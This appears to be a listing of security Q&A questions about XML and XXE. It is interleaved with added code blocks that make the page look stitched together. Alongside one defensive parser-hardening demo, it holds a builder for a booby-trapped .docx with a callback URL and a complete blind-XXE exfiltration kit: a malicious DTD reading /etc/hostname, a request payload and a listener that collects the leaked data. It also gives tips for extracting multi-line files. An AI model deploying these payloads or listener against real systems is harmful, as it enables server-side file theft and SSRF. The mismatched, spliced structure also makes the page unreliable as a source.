
Questions tagged [xml]

XML (Extensible Markup Language) is a set of rules for encoding documents in both human-readable and machine-readable form. Use this tag for security issues relating to the format itself, or where the fact that the data is XML-formatted is core to the question.

-2 votes, 1 answer, 204 views

I want to write down, as security requirements, the recommended security configurations that should be applied to any XML parser. I checked the OWASP cheatsheet (https://cheatsheetseries.owasp.org/...
asked by anonymous
1 vote, 0 answers, 477 views

Currently, I've discovered an OOB XXE that allows me to include a .dtd file to extract the content of a particular system file, for instance, /sys/power/disk. So my file.dtd is: <!ENTITY % data SYSTEM &...
asked by nicg
1 vote, 0 answers, 560 views

I was able to extract a line from the /etc/hostname file and also http://169.254.169.254/latest/meta-data/local-hostname, but I want to extract the content of files with multiple lines, such as the AWS ...
asked by ELMO
1 vote, 2 answers, 1k views

If I am already using xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); then do I also need to use xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities",...
asked by Rupesh Pal
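The two StAX properties in the question above are two different controls: one stops the parser from resolving external entities, the other stops it from accepting a DTD at all (and external entities can only be declared inside a DTD, so refusing the DTD is the stronger setting). The following is an added example, not code from the question or from any answer to it, showing the same two controls in Python's standard-library xml.sax parser: the same XXE document parsed with external entity resolution switched on, with the default (off), and with a lexical handler that rejects any DOCTYPE. The "secret" file is a constructed temp file standing in for /etc/hostname; all names are mine.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class _Text(handler.ContentHandler):
    """Collects character data so we can see what an entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class DoctypeForbidden(ValueError):
    """Raised by the strict parser as soon as a <!DOCTYPE ...> is seen."""


class _NoDoctype:
    """Minimal SAX lexical handler: every callback is a no-op except startDTD,
    which aborts the parse before any entity declaration is processed."""

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def endDTD(self):
        pass

    def startDTD(self, name, public_id, system_id):
        raise DoctypeForbidden(f"DOCTYPE {name!r} rejected: DTDs are not accepted")


def _parse(xml_text, external_ges=None, forbid_doctype=False):
    parser = xml.sax.make_parser()
    if external_ges is not None:
        # feature_external_ges: resolve external general entities (&xxe;)
        parser.setFeature(handler.feature_external_ges, external_ges)
    if forbid_doctype:
        parser.setProperty(handler.property_lexical_handler, _NoDoctype())
    sink = _Text()
    parser.setContentHandler(sink)
    parser.parse(io.BytesIO(xml_text.encode()))
    return "".join(sink.parts).strip()


def xxe_document(file_url):
    """The textbook XXE payload: an external general entity pointing at a file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{file_url}">]>\n'
        "<foo>&xxe;</foo>"
    )


def write_secret(content="secret-host\n"):
    """Constructed stand-in for /etc/hostname; returns its file:// URL."""
    tmp = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    tmp.write(content)
    tmp.close()
    return pathlib.Path(tmp.name).as_uri()


def parse_vulnerable(xml_text):
    """External general entities enabled: the file is fetched and inlined."""
    return _parse(xml_text, external_ges=True)


def parse_default(xml_text):
    """Python >= 3.7.1 default: the entity is left unresolved, text is empty."""
    return _parse(xml_text)


def parse_strict(xml_text):
    """Rejects any DOCTYPE outright, so entity tricks never reach entity handling."""
    return _parse(xml_text, forbid_doctype=True)


if __name__ == "__main__":
    doc = xxe_document(write_secret())
    print("vulnerable :", repr(parse_vulnerable(doc)))
    print("default    :", repr(parse_default(doc)))
    try:
        parse_strict(doc)
    except DoctypeForbidden as e:
        print("strict     :", e)
```

The default parser already leaves the entity unresolved, but that still depends on a feature flag that a later configuration change could flip back; the strict variant fails closed on the first DOCTYPE, which is the behaviour the OWASP guidance asks for.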
0 votes, 2 answers, 1k views

There's a web application on a server which I have full access to which accepts POST requests on a REST endpoint. The request payload is expected to be an XML document. For request routing and load ...
asked by G_H
1 vote, 2 answers, 700 views

I keep hearing about the XML round trip vulnerability in version 3.2.4 of the Ruby package REXML. I looked into it myself, of course, and it seems to have something to do with parsing an XML document, ...
asked by Alex V
1 vote, 1 answer, 1k views

My lab: Kali Linux 192.168.171.134; bWAPP server: http://192.168.171.131. I want to do data exfiltration via HTTP on this blind XXE. I'll use the PortSwigger payload. This is the External.DTD: &...
asked by Zefiro38
1 vote, 1 answer, 1k views

SCENARIO: I successfully tried to send a request to the Burp Collaborator, so the application is vulnerable to SSRF through blind XXE. The payload I used is the following <?xml version="1.0&...
asked by Maicake
0 votes, 2 answers, 1k views

My goal is to create a docx file that, when uploaded to a server and parsed there, causes the parser to fetch my URL so I know it worked. Unfortunately, I only have LibreOffice and not MS Office at ...
asked by Sorokine
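A .docx is an OOXML package, which is a zip archive of XML parts, so the reliable way to plant a DOCTYPE in one is to write the archive by hand rather than through a word processor (LibreOffice and Word re-serialize every part on save, so a DOCTYPE pasted into a part and saved normally does not survive). The following added example, mine and not from the question, builds the three mandatory parts with Python's zipfile and puts an external entity in word/document.xml; the callback URL and the `find_doctype_parts` upload check are assumptions for illustration.

```python
import io
import zipfile

# The three parts every OOXML consumer requires to recognise a Word package.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>
"""

RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>
"""


def document_xml(callback_url):
    """The main document part carrying the external entity. Deliberately no
    standalone="yes": a standalone document lets parsers ignore external
    declarations. The entity is referenced in a run so parsers that only
    resolve entities on use still trigger the fetch."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE w:document [\n"
        f'  <!ENTITY xxe SYSTEM "{callback_url}">\n'
        "]>\n"
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">\n'
        "  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>\n"
        "</w:document>\n"
    )


def build_docx(callback_url):
    """Return the bytes of a .docx whose document part loads callback_url."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", document_xml(callback_url))
    return buf.getvalue()


def find_doctype_parts(data):
    """Defender-side heuristic (assumed, not from the question): list the XML
    parts of an uploaded package that carry a DOCTYPE. Cheap to run before
    handing the file to a parser, but not a substitute for parser hardening
    (encoding tricks can hide the literal string)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith((".xml", ".rels")) and b"<!DOCTYPE" in z.read(name):
                hits.append(name)
    return hits


def part_names(data):
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return sorted(z.namelist())


if __name__ == "__main__":
    # http://127.0.0.1:8000/ping is a placeholder; point it at your listener.
    blob = build_docx("http://127.0.0.1:8000/ping")
    with open("xxe-test.docx", "wb") as f:
        f.write(blob)
    print(part_names(blob), find_doctype_parts(blob))
```

Whether the fetch actually happens depends entirely on the server-side library that opens the part, which is exactly what the upload test is meant to find out; a correctly configured parser will reject the DOCTYPE and the callback never arrives.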
0 votes, 1 answer, 278 views

What I want to do is access the Content-Type header which is placed under the Access-Control-Allow-Headers header, as I want to attempt to change JSON to XML on a web application I'm working on to check ...
asked by sheppard
2 votes, 1 answer, 657 views

If you Google for an example of XXE injection you get something like this: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe ...
asked by XCore
4 votes, 1 answer, 511 views

I've been studying XXE attacks through PortSwigger's Web Security Academy. I stumbled upon a lab, Exploiting blind XXE to exfiltrate data using a malicious external DTD. In this lab an attacker has to ...
asked by Shuzheng
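Several of the questions above (the OOB XXE with a hosted .dtd, the bWAPP lab, the Collaborator-confirmed blind XXE, and the Web Security Academy lab) use the same attacker-side setup: a host that serves the external DTD and records whatever the target parser appends to the callback URL. The following added example is my stand-in for Burp Collaborator, not code from any of those questions; the listener address, the path names and the target file are assumptions.

```python
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

LISTENER = "http://127.0.0.1:8000"  # assumed; replace with a host the target can reach


def malicious_dtd(target_file, listener=LISTENER):
    """External DTD: read target_file into a parameter entity, then declare a
    second external entity whose SYSTEM identifier embeds it in the callback
    URL. &#x25; is an escaped '%' so the inner declaration is only created
    when %eval; is expanded; %exfil; then makes the parser issue the request."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{listener}/leak?d=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def payload(listener=LISTENER):
    """The request body sent to the target: it only loads the hosted DTD."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{listener}/evil.dtd"> %xxe;]>\n'
        "<foo>x</foo>\n"
    )


def extract_leak(path):
    """Pull the exfiltrated value out of a request path like /leak?d=... ."""
    query = urllib.parse.urlsplit(path).query
    return urllib.parse.parse_qs(query).get("d", [""])[0]


class Listener(BaseHTTPRequestHandler):
    dtd = malicious_dtd("/etc/hostname")  # target file is an assumption
    leaks = []

    def do_GET(self):
        if self.path == "/evil.dtd":
            body = self.dtd.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            # Anything else is the callback carrying the data.
            Listener.leaks.append(extract_leak(self.path))
            self.send_response(204)
            self.end_headers()

    def log_message(self, fmt, *args):
        print("[callback]", self.path)


def serve(host="127.0.0.1", port=8000):
    """Start the listener in a background thread; returns the server object."""
    srv = HTTPServer((host, port), Listener)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = serve()
    print("send this body to the target:\n" + payload())
    try:
        srv.serve_forever()
    except KeyboardInterrupt:
        print("leaked values:", Listener.leaks)
```

This only works for single-line files, which is the limitation the /etc/hostname question above runs into: the file content lands inside a URL, and a newline makes that URL invalid, so the parser errors out before any request is made. The usual workarounds are an FTP listener instead of HTTP (the FTP exchange tolerates the line breaks), a wrapper that flattens the content first where the target offers one (php://filter/convert.base64-encode on PHP targets), or error-based extraction where the parser's own error message echoes the path it failed to open.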
1 vote, 1 answer, 2k views

We have a legacy application on Spring MVC and we have a web service exposed (SOAP protocol) for some reporting client app. This service was tested by a security team and the report indicates that the ...
asked by Suhas Karanth
1 vote, 0 answers, 315 views

Veracode reports that the below code is susceptible to CWE-611: Improper Restriction of XML External Entity Reference. XslCompiledTransform transform = new XslCompiledTransform(); transform.Load(...
asked by Hoppe
0 votes, 1 answer, 780 views

I'm modifying an ASP.NET MVC 5 web site and a requirement is to allow users to upload an XML and PDF file. The XML file will be used to lay out text on the PDF based on variables coming from within the ...
asked by bernieslearnings
